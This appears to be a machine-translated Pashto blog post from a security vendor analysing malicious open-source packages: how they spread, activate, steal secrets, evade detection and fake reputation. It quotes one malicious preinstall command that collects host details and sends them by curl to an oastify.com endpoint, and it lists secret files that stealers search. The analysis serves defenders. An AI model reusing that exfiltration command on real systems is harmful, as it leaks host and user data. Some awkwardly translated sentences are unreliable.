په تیرو قسطونو کې، د خلاصې سرچینې ناوړه کڅوړې: ستونزه، موږ بحث وکړ چې ولې د ګواښ عاملین دومره وو د موجوده اجزاو په وروستي نسخو کې د نوي ناوړه اجزاو خپرولو یا مالویر انجیکشن کولو په اړه لیواله: د خلاصې سرچینې زیربنا هرچا ته اجازه ورکوي چې هرچیرې یو لنډمهاله حساب جوړ کړي د اجزاو په راجسټری کې (لکه NPM، PyPI، ډاکر هب یا ویژول سټوډیو مارکیټ پلیس) یا د همکارۍ پراختیا پلیټ فارم (لکه GitHub). صفر لګښت، او د هغه اضافي باور څخه ګټه پورته کولو لپاره ډیری فرصتونه چې سافټویر ټیمونه په دودیز ډول د دریمې ډلې اجزاو باندې لري.
د بریدګرو لپاره د خلاصې سرچینې لپاره د موجود زیربنا په کارولو سره د مالویر ویشل څومره اسانه دي، او د سافټویر پراختیا کونکو سازمانونو (هرڅوک؟) لپاره د مالویر سره د اخته کیدو څخه د مخنیوي لپاره څومره سخته ده (او په هغه سافټویر کې مالویر وړاندې کول چې دوی یې د نورو لپاره توزیع کوي) ترمنځ نا انډولتیا، د دې لامل شوې چې تیر کال د ناوړه کڅوړو ربع ملیون ته نږدې شي.
دا د دومره لویې ستونزې ده چې هیڅ یو سازمان یې نشي حل کولی، او ټولنه د باور، خوندي-بای-ډیفالټ او خوندي-بای-ډیزاین اصولو، او د اجزاو د ژوند دورې په اړه د خلاصې سرچینې پروسې بیاکتنې په پروسه کې ده. موږ به په راتلونکې قسط کې داسې نظرونو ته یوه کتنه وکړو. د خلاصې سرچینې ناوړه کڅوړو په وړاندې ساتنه: څه (نه) کار کوي.
په یاد ولرئ چې موږ د سافټویر اجزاو په اړه خبرې کوو چې ډیری وخت ورته وي ساوتري بنډل: د بیا کارونې وړ اجزا بسته شوي ترڅو دوی د سافټویر مینیفیسټ کې د انحصار په توګه راجع شي، او د پیکج مدیر یا جوړونې وسیلې سره نصب شي. مهرباني وکړئ په یاد ولرئ چې دا قضیه د عامه شاملولو لپاره پراخه کیدی شي د کانټینر انځورونه (د کانټینر چلولو وختونو او د کوبرنیټس په څیر د آرکیسټریشن پلیټ فارمونو لخوا کارول کیږي)، او د سافټویر وسیلو ته غځول (د جوړولو، اتومات کولو، او ځای پرځای کولو لپاره).
دلته موږ تحلیل کوو چې دا څنګه د ناوړه اجزاو پر بنسټ د برید تاکتیک د تیرو مثالونو او هغه څه سره سم چې موږ د مالویر لومړني خبرداری لپاره زموږ په پلیټ فارم کې لیدلي دي کار کوي (MEW). موږ به ناوړه اجزا په مختلفو ابعادو کې تحلیل کړو:
(۱) د ویش لپاره غوره شوې لاره (په نوي یا موجوده برخه کې کارول شوې راجسټری، او هغه تخنیک چې د خپاره شوي برخې نسخې د انتان کولو لپاره کارول کیږي)، (۲) مالویر څنګه فعال یا فعال کیږي، (۳) ناوړه چلند، یعنې کوم زیان رسونکي عملونه لیدل کیږي او د بریدګر هڅونه څه ده، (۴) کوم تخنیکونه د پټولو لپاره عام دي، د پام نه کولو لپاره پټول، اړخي حرکت، د قوماندې او کنټرول (C2) کوربه سره اړیکه، او داسې نور؛ او (۵) د کافي شهرت او باور ترلاسه کولو تخنیکونه ترڅو قربانیان په پای کې برخه نصب کړي.
د وېش میکانیزم غوره شو
موږ ګورو چې "شاليد غږ"د ناپوهه پراختیا کونکو د دوی د انحصار لپاره د بسته نوم کې د ټایپ کولو لپاره د ټایپ کولو لپاره د ټایپ کولو په کارولو سره د غیر محتاط پراختیا کونکو فش کولو لپاره د غیر پرمختللي ناوړه کڅوړو څخه. ډیری مشهور کڅوړې د ورته نومونو لرونکي بسته بندۍ ترلاسه کوي چې ټایپونه لري، پدې تمه چې دوی به ځینې غیر محتاط پراختیا کونکي فش کړي.
دوی یو لنډمهاله حساب کاروي، د ټایپوسکواټ پیکجونو یوه ډله خپروي، بله جوړوي، او بله ډله خپروي... د یو څه اتومات کولو او هوښیارۍ په کارولو سره دوی کولی شي یو څه پیچلتیا ترلاسه کړي، مګر معمولا دوی خورا کوچني دي. موږ په داخلي توګه دوی ته "انتونیو". د اسنادو غلا کول اصلي هدف دی، مګر کله ناکله موږ ګورو چې سپایویر د سرچینې کوډ یا حساس معلوماتو لکه شخصي پیژندل شوي معلومات (PII)، د کلپ بورډ نیول، او نور شکونه خپروي.
ناڅاپه موږ ډیر پیچلي ناوړه اجزا ګورو، "شارکونه". یو اقلیت د ځانګړو ډلو یا سازمانونو په نښه کیږي، په ځانګړي ډول د کریپټو ډرینرونو یا ویب سکیمرونو سره چې په مشروط ډول فعال شوي وي، شاید هغه طریقه تعقیب کړي چې په کې لیدل کیږي. د پیښې جریان د برید د پیلوډ ډیکریپټ کول یوازې هغه وخت چې بسته د هدف بسته څخه حواله کیږي.
د ویش میکانیزم په غوره او اوس کلاسیک مقاله کې تحلیل شوی، "د بیک سټابر د چاقو ټولګه: د خلاصې سرچینې سافټویر رسولو سلسلې بریدونو بیاکتنه"، کوم چې باید لوستل شي. یقینا تاسو دا ښکلی چارټ مخکې لیدلی وي:

ټولې لارې وپلټل شوې، په شمول د نوي او موجوده کڅوړو؛ د سرچینې کوډ، د جوړولو سیسټم، یا پخپله بسته شوي برخې اغیزه کول؛ د غلا شوي اسنادو یا ټولنیز انجینرۍ کارول؛ پریښودل شوي حسابونو او زیرمو تښتول یا ساتل شوي مسموم کول. ځینې بریدونو نومونه ترلاسه کړل (ټایپوسکوټینګ, د انحصار ګډوډي, ښکاره ګډوډي, د ریپو جیکینګ. او داسې نور) او لا دمخه په بل ځای کې بحث شوي دي.
د غوره شویو راجسترونو په اړه څه؟
NPM د ناوړه پیکجونو په ټولیز شمیر کې مخکښ پاتې کیږي، مګر موږ سږکال په PyPI کې زیاتوالی ولید. پایتون د معلوماتو ساینس او ماشین زده کړې لپاره یو مشهور ایکوسیستم دی. په حقیقت کې، د مالویر کثافت اوس په PyPI کې د NPM په پرتله لوړ دی.
مالویر څنګه فعال کیږي
ناوړه کڅوړې د نصبولو پرمهال یوازې په لسو قضیو کې په څلورو کې فعالې کیږي (په وروستیو کلونو کې دا له لسو څخه نږدې شپږو ته نږدې وه). پاتې نور د چلولو په وخت کې ناوړه چلند چلوي، د ازموینو چلولو پرمهال له ۱۰۰ څخه ۱ فعالې شوې. داسې ښکاري چې مخالفین پوهیږي چې د نصبولو سکریپټونو غیر کنټرول شوي اجرا په ډیری ځایونو کې غیر فعاله شوې وه.
بد خلک څه ترلاسه کوي؟
موږ به د ناوړه چلند کټګورۍ لیست کړو، لومړی به ترټولو مشهورې سره. مهرباني وکړئ په یاد ولرئ چې اغیز خورا توپیر کولی شي: a وایپر په کلکه ویجاړونکی دی، مګر دا عام نه دی او یوازې په څو قضیو کې لیدل شوی، د هدفمند سایبر جګړې کمپاینونو یا ظالمانه هیکټیویزم پورې اړوند. لاندې کټګورۍ خورا عامې دي:
- InfoStealer/Credentials Drainer. تر اوسه پورې تر ټولو ډېر ځله، له ۹۰٪ څخه ډېر غیر مسلکي بریدونه ساده غلا کوونکي دي چې په عمده توګه د پاسورډونو، لاسرسي ټوکنونو، API کیلي، او شخصي کیلي (د SSH او داسې نورو لپاره) په لټه کې دي. دا شاید د لیکلو لپاره ترټولو ساده وي (د وایپرونو سره؟). دوی پیژندل شوي فایلونه/ډائریکټرۍ او نورې سرچینې (د بیلګې په توګه د راجسټری کیلي) شمیري، مینځپانګې بسته کوي، او دا معلومات C2 سرور ته لیږي. نظر ساده دی: "زه د فشینګ اسنادو لپاره یو غلا کوونکی خپروم، نو زه کولی شم وروسته د لارښود برید پیل کولو لپاره اسناد وکاروم".
د C2 شبکه چې لیدل کیږي معمولا ارزانه او چټل وي، لکه د ټیلیګرام چینلونه یا د نګروک په څیر د تونل کولو وسایل (ډیری وختونه د VPN د وتلو IPs له لارې د ریورس پراکسي په بڼه). په سلګونو (!) امکانات شتون لري، د ډیری GitHub پروژو سره چې د لاندې دي د پټنوم غلا موضوع. تخصصونه لکه کیلاګرز د ناوړه پیکجونو او کانټینر عکسونو لپاره نادر دي، مګر د وسیلې توسیعونو کې ډیر ځله، چیرې چې د کاروونکي تعامل تمه کیږي.
- ډراپر / ډاونلوډر. په شهرت کې دوهم، معمولا په څو مرحلو بریدونو کې لومړی راځي. د ناوړه اجزاو څخه په دریو کې له یو څخه ډیر ډراپرز لري (که چیرې ناوړه تادیه په بسته کې شامله وي) یا ډاونلوډرونه (پیلوډ د برید کونکي تر کنټرول لاندې د پای نقطې څخه ډاونلوډ شوی وي). تادیه اکثرا د بائنری مالویر یو پیژندل شوی ډول دی، او دا د شا دروازو، سپایویر، کریپټو ډرینرونو، او نورو کارولو قضیو نصبولو لپاره چلول کیږي او ځینې وختونه دوام لري. ډاونلوډ شوی یا ځای پر ځای شوی تادیه د موجوده مالویر بائنریونو لخوا چمتو شوي ټول ځواک سره د دوهم پړاو برید پیل کوي. بائنریونه د بسته کې ویشل کیدی شي، ډیری وختونه د عکسونو یا ګمان کیږي چې بې ضرره فایل ډولونو په توګه پوښل شوي، ترڅو د ناڅاپي سایټونو سره د نښلولو پرمهال د کشف څخه مخنیوی وشي.
- د کریپټو کرنسی غلا کوونکي / کان کیندونکي. مالي پلوه هڅول شوي مخالفین لیواله دي چې ستاسو د کلاوډ شتمنیو څخه د کریپټوماینرونو چلولو لپاره کار واخلي (دوی حتی دا هم کشف کوي چې ایا دوی په کلاوډ VM کې روان دي). دوی د دې پروا نه کوي د ټیټې ګټې تناسب د غلا شوي کلاوډ زیربنا لپاره قرباني ته د هر $53 لپاره $1 اخیستل کیږي. قربانیان ممکن د دې څخه خبر نه وي تر هغه چې دوی یو ناڅاپي بل ترلاسه نه کړي. له نېکه مرغه، دا راځي او ځي. کرپټوکسیک په ناوړه کڅوړو کې کمپاینونه کله ناکله پاپ اپ کیږي او بیا ورک کیږي، د والټ کاروونکو لپاره فشینګ کوي یا په پای کې د والټ چمتو کونکي په نښه کوي، لکه څنګه چې په د لیجر برید.
نور چلندونه، لکه د ځای پر ځای کول a د املي د ریورس شیل خلاصولو سره د لرې کوډ اجرا کولو لپاره اوس د تیرو وختونو په پرتله لږ عام دی. د مثال په توګه، ۱۲۳rf_مرسته کوونکی_ویب بسته (اوس له راجسټری څخه لیرې شوې) پرته له کوم ابهام څخه خلاصیږي چې د ریورس شیل څخه کاپي او پیسټ شوی وي د شیل چیټ شیټ ریورس کړئ:

د مشروع او ناوړه برخو سربیره، موږ ډیری ناوړه ګټه اخیستنې لیدلي دي، په شمول د:
سپیم پیکجونه
په زرګونو کوچني کڅوړې شتون لري، ډیری یې په NPM کې، هیڅ مالویر نلري مګر د اسانه عاید ژمنه کوي، د مار غوړ، د ویاګرا وړاندیزونو لینکونه، او دا ټول. یو څو کاروونکي دا ډول سپیم خپروي او د راجسټری څخه ډیر بینډ ویت اخلي. یو بل لوبغاړی چې ممکن د اندونیزیا څخه وي هڅه وکړه چې ګټه پورته کړي د چای ناوړه ګټه اخیستنه درجه بندي د خلاصې سرچینې پراختیا کونکو ته د جبران ورکولو لپاره، د اړوند GitHub جعلي زیرمو سره د لسګونو زرو متقابل NPM کڅوړو رامینځته کولو سره. دا د کارولو شرایطو څخه ښکاره سرغړونه ده.
د بګ انعام او امنیتي څیړنې جعلي افواهات
کله چې یو پیکج ځان د ښو موخو لپاره د معلوماتو د افشا کولو په توګه بیانوي، لکه د بګ فضل پروګرامونو لپاره د امنیتي نیمګړتیاوو کشف کول یا د ایکوسیستم ځینې اړخونو څیړنه. موږ په دې کټګورۍ کې زرګونه پیکجونه لیدلي دي، کوم چې د پورټ سویګر څخه د برپ همکار پتې ته پیژندنه راوړي مګر ډیر حساس معلومات نه راوړي (د مثال په توګه په oastify.com ډومین کې کوربه). موږ ډیری وختونه د کاپي کیټونه لیدلي دي د انحصار ګډوډي د الیکس بیرسن لخوا د مفهوم ثبوت، لکه د اورورا-ویب میل-پرو پیکج (له راجسټری څخه لرې شوی)، کوم چې په ساده ډول دا ناوړه کوډ د نصبولو دمخه سکریپټ کې چلوي:
exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done") او همدارنګه پکې شامل وو "دا د ساده انحصار مغشوش برید د مفهوم ثبوت دی" د ردولو توضیحات په package.jsonدا د خدماتو د شرایطو څخه ښکاره سرغړونه ده، حتی د ناوړه ارادې پرته.
کوم ښه خبر؟ موږ (تر اوسه) د رینسم ویئر بریدونه د ناوړه اجزاو له لارې نه دي لیدلي. د نامعلومو دلایلو لپاره، سایبر مجرمین داسې ښکاري چې دودیز بریښنالیک فشینګ، RDP-based، او د ډرایو لخوا ډاونلوډ رسولو میکانیزمونو ته ترجیح ورکوي.
اضافي تخنیکونه لیدل شوي

د دوام، دفاعي تیښتې، د معلوماتو راټولولو، د قوماندې او کنټرول کوربه سره د اړیکو، او د اخراج لپاره ډیری تخنیکونه کارول شوي.
دوام په ناوړه برخو کې د دوهم پړاو بائنري مالویر کې د دوام ځانګړتیاو په کارولو سره ترلاسه کیږي، مګر ځینې وختونه چلند د بسته بندۍ کوډ کې موقعیت لري، د مهالویش شوي دندو او د وینډوز راجسټری کې بدلونونو سره خورا عام دی.
معرفي کول عام دی، خو بې خونده دی. د ټایپ کولو ډیری کڅوړې (په یاد ولرئ "انتونیو"?) په هیڅ ډول د ابهام څخه کار نه اخلي؛ ډیری یې یا هم کوچني کاروي (بیس 64/هیکس کوډ کول یا د بدیل سیفرونه لکه rot13) یا د شته کوډ ابهام کونکو او مینیفیکیشن څخه کار اخلي، کوم چې په اسانۍ سره د سم اوزارینګ سره بیرته راګرځیدلی شي. یوازې "شارکونه" ریښتیني، سخت کور، ابهام، چې د بیرته راګرځولو لپاره سخت وي، ترسره کوي.
پټول ممکن برید پټ کړي، مګر ولې به د خلاصې سرچینې برخې کې کوډ پټول اړین وي؟ ایا داسې شواهد شتون لري چې یو څه باید د ښکاره لید څخه پټ شي؟ موږ د غیر ناوړه کڅوړو ډیری مثالونه موندلي چې د فکري ملکیت ساتنې لپاره پټول کاروي، کوم چې د "خلاصې سرچینې" سره متضاد دی. پټول د مالویر د شواهدو په توګه کارول کیدی شي، مګر دا حتمي ندي. د پټول هم ستونزمن دي.
تيښته د دفاعي کنټرولونو څخه ساده تخنیکونه غوره کوي. ناوړه کوډ اکثرا په کې خوندي وي هڅه وکړئ ... ونیسئ هغه بلاکونه چې هر ډول استثناوې له پامه غورځوي، نو غیر معمولي فعالیت په لاګونو کې نه ښودل کیږي. د چاپیریال تایید (په VM یا کانټینر کې چلول) نادر دی، پرته لدې چې د مالویر لپاره چې یو ځانګړی سازمان یا چاپیریال په نښه کوي.
په انځورونو او PDF فایلونو کې د بائنریونو پټول (یو ډول سټیګنوګرافي) یو بل تخنیک و چې د کشف څخه د تیښتې لپاره لیدل کیده.
څرنګه چې تر ټولو عام زیان رسونکي اجزا د معلوماتو غلا کوونکي دي، د معلوماتو راټولول ضروري ده. رازونه (پاسورډونه، د لاسرسي ټوکنونه، API کیلي، کریپټوګرافیک کیلي) په منظم ډول د لاګ فایلونو، چاپیریال متغیرونو، او حتی کلپ بورډ کې سکین کیږي (د بانکي ټروجنونو او کریپټو سټیلرونو سره لیدل کیږي). د سرچینې کوډ افشا کول هم عام دي، ځکه چې د پیکج نصب کول ډیری وختونه په پراختیایي نوډ کې ترسره کیږي چیرې چې داخلي ګیټ ذخیره کلون کیدی شي. موږ د ګیټ ذخیره په لټه کې د ډایرکټریو شمیرلو کڅوړې لیدلي دي. د .env، private.pem، settings.py، app.js، یا application.properties په څیر ځایونو لټون کول خورا عام دي.
د معلوماتو ایستل یو بل پراخه کارول شوی عمل دی. یوازې د ناوړه کڅوړو لږ شمیر حتی هڅه کوي چې د استخراج شوي معلوماتو منزل پټ کړي. د ټیلیګرام چینلونه او د نګروک په څېر تونلونه ډیری وختونه کارول کیږي. او ډیری شتون لري معمولا سپین لیست شوي ډومینونه د اخراج لپاره کارول کیږي.
نور تخنیکونه، لکه د امتیاز لوړول یا جانبي حرکت، لږ عام وو.
د شهرت او باور ترلاسه کول
تصور وکړئ چې یو تخنیکي غل د یو تیار شوي وژونکي ناوړه شی سره حیران وي: "څنګه کولی شم دا د #$ ټوټه د دې بې باوره احمقانو لپاره د باور وړ کړم؟".
دا پدې معنی ده چې څنګه د ناوړه برخې لپاره ننوتل رامینځته کړئ ترڅو ډیری ستوري / فورکونه (د شهرت لپاره) وښیې، جمع نسخې / مسلې او pull requests (د فعالیت لپاره). مفکوره دا ده چې جعلي شهرت (ستوري) او انحصار کونکي ترلاسه کړي، او د تړاو او ساتنې په اړه قانع کونکی نظر ترلاسه کړي.
راجستر دا نه ګوري چې ایا د ګیټ هب پروژې مینځپانګې او د کڅوړې مینځپانګې سره سمون لري.. دا د سافټویر رسولو زنځیر کې یوه پیژندل شوې ستونزه ده. عامه راجسترونه لوی ډنډونه دي چې هر هغه څه چې په دوی باندې اچول کیږي تیریږي. تاسو کولی شئ هر ذخیره سره اړیکه ونیسئ.

که چیرې د ناوړه پیکج ټایپ یو مشهور سره ټکر وکړي، نو دا اسانه ده: یوازې د ګیټ هب موجوده زیرمه په هغه انحصاري منیفیسټ کې حواله کړئ چې د پیکج جوړولو او راجسټری کې خپرولو لپاره کارول کیږي. د جعلي ګیټ هب ریپو کې د نویو پیکجونو لپاره، تاسو ممکن ډیر هوښیارۍ ته اړتیا ولرئ، شاید جعلي جوړول ستوری لیدل / فورک کول د سکرپټینګ له لارې د GitHub حسابونه.
او که ستاسو د پیکج محتويات د ریپو سره په معقول ډول ورته وي، دلته او هلته یو څو ښه ډیزاین شوي بدلونونه واچوئ ... تاسو کولی شئ خپل مالویر په یوه نوي پیکج کې داخل کړئ چې د یو مشهور پیکج سره ورته وي چې د موجوده ذخیره حواله کوي، او د ټایپ کولو غلطیو ته انتظار وکړئ. که څوک جرئت وکړي چې د پیکج ټربال مینځپانګې د GitHub ذخیره څخه مینځپانګې سره پرتله کړي، د مالویر انجیکشن نقطو کې توپیرونه په اسانۍ سره له لاسه ورکول کیدی شي. موږ دا طریقه ډیری ځله دمخه لیدلې ده.
د یوې برخې لپاره یو میکانیزم چې د اصليت په اړه د لاسوهنې ضد بیان ورکړي، دا څنګه بسته جوړه شوې، له کومو سرچینو څخه ده، او د چا لخوا، به ښه راغلاست وي. مګر دا بله کیسه ده.
ایا د X برخې مالویر دی؟
ایا د ناوړه کڅوړو یو (جامع) ډیټابیس شتون لري؟ نه. د خلاصې سرچینې زیان منونکو لپاره د CVE ID ټاکل شوی، مګر یوازې یو څو ناوړه کڅوړو ته (په ځانګړي توګه هغه چې سرلیکونه جوړوي) ورکړل شوي. د ناوړه کڅوړو لپاره CWE دی CWE-506 (د ناوړه کوډ سره یوځای شوی).
د مالویر معمول وسایل (VirusTotal، MalwareBazaar، SOREL-20M…) د ناوړه برخو لپاره ځانګړي احکام نه وړاندې کوي. دا به ښه راغلاست وي!
د تحلیل لپاره د څیړنې نمونې ډیټابیسونه او ډیټاسیټونه شتون لري (موږ یې یو څو کاروو)، مګر داخلې یوازې هغه وخت تازه کیږي کله چې ناوړه بسته پیژندل کیږي، کوم چې ډیری وختونه ډیر ناوخته وي. که تاسو لیوالتیا لرئ، OpenSSF ناوړه کڅوړې ښه پیل دی.
په راتلونکې پوسټ کې، موږ به په دې اړه بحث وکړو چې څنګه پوه شو چې ایا یو ورکړل شوی پیکج ناوړه دی. سپویلر: هو، د افشا کولو کړکۍ په پیل کې د ناوړه اجزاو د چک کولو لارې شتون لري، مخکې لدې چې راجسټری یو پیژندل شوی ناوړه جز لرې کړي.
نور مطالعې
په راتلونکې قسط کې "د خلاصې سرچینې ناوړه کڅوړو په وړاندې ساتنه: څه (نه) کار کوي" موږ به د خلاصې سرچینې امنیت لپاره د کولو او نه کولو په اړه بحث وکړو. ډیری امنیتي پوهه لرونکي مسلکي کسان د دې ګواښ سره د مقابلې په اړه پوهه لري، مګر غلط فهمۍ ډیرې دي.
موږ به بیاکتنه وکړو چې ولې دا نظرونه غلط دي، او دا ډول غلط فهمۍ څنګه د دې برید میکانیزم شهرت او هغه لوی خطر سره مرسته کوي چې سازمانونه ورسره مخ دي. موږ به بیا د دې سره مخ شو چې څه کار کوي، او کومې هڅې او سرچینې پکې شاملې دي.
همدارنګه، موږ به د ناوړه پیکجونو د ارتقا په اړه د دوی د ارادې، انجیکشن میکانیزم، او د برید تخنیکونو له مخې پوسټ وکړو.
پاتې شه!






